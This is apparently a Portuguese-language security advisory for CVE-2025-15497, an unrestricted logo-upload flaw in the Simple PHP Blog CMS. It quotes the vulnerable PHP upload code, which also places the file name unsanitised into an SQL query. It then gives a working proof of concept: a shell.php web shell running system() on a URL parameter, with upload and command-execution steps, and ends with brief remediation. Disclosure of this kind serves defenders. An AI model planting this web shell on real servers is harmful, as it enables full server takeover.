
CVE-2025-15497 - Upload Arbitrário de Arquivo Levando à Execução Remota de Código (RCE)
BiggiDroid – Simple PHP Blog CMS Página do produto: https://biggidroid.com/product/simple-php-blog/
Crítica
CVSS (Estimado): 9.8 (AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H)
O Simple PHP Blog CMS contém uma vulnerabilidade de upload irrestrito de ficheiros na funcionalidade de upload do Logótipo do Site no painel de administração. Um atacante autenticado pode carregar um ficheiro PHP malicioso disfarçado de imagem, que é armazenado num diretório acessível pela web e executado pelo servidor, resultando em execução remota de comandos.
Painel de Administração → Atualizar Logótipo do Site
Excerto de código vulnerável relevante:
$target = "../image/".basename($_FILES['image']['name']);
$image = $_FILES['image']['name'];
$query = mysqli_query($con,
"UPDATE sitedetails SET sitelogo='$image' WHERE id='$id'");
if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
// sucesso
}
Crie um ficheiro chamado shell.php:
<?php
$cmd = $_GET['cmd'] ?? '';
echo "<pre>";
system($cmd);
echo "</pre>";
?>
shell.php como ficheiro de logótipo📌 A aplicação aceita o ficheiro PHP sem validação
Após o upload, o ficheiro está acessível em:
http://127.0.0.1/image/shell.php
Execute comandos do sistema:
http://127.0.0.1/image/shell.php?cmd=dir
O servidor executa comandos do SO e retorna a saída, confirmando Execução Remota de Código.





Um atacante pode:
Esta vulnerabilidade pode levar à tomada total do servidor.
.htaccess / hardening do servidorRestringir extensões de ficheiro
$allowed = ['jpg','jpeg','png','gif'];
Validar tipo MIME
finfo_file()
Renomear ficheiros carregados